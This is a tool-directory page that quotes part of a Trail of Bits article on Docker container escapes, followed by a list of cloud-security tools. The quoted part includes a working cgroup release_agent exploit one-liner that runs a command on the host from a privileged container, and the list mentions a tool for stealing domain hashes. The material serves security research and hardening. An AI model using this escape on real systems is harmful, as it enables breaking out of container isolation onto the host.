Understanding Docker container escapes Logo

Understanding Docker container escapes

0
Free
Visit Website

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes. Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature. Here’s a version of the PoC that launches ps on the host: # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh ps >'"$t/o" >/c; chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and

FEATURES

ALTERNATIVES

Cloud security platform that provides configuration monitoring, compliance management, and security analysis across multi-cloud environments.

Commercial

Implements a cloud version of the Shadow Copy attack against domain controllers in AWS, allowing theft of domain user hashes.

Cloud Custodian (c7n) is a rules engine for managing public cloud accounts and resources with a focus on security, compliance, and cost optimization.

A cloud security platform that combines Kubernetes security scanning, runtime monitoring, and cloud security posture management using Kubescape and eBPF technology.

Commercial

LogRhythm SIEM is a comprehensive security information and event management platform that collects, analyzes, and responds to security events across an organization's IT infrastructure.

Commercial

A cloud and database asset intelligence platform that provides continuous monitoring, compliance management, and security posture assessment across hybrid cloud environments.

Commercial

Open-source policy-as-code software for multi-cloud and SaaS environments with GPT model conversations and custom analysis policies.

Cloudmarker is a cloud monitoring tool and framework that audits Azure and GCP cloud environments.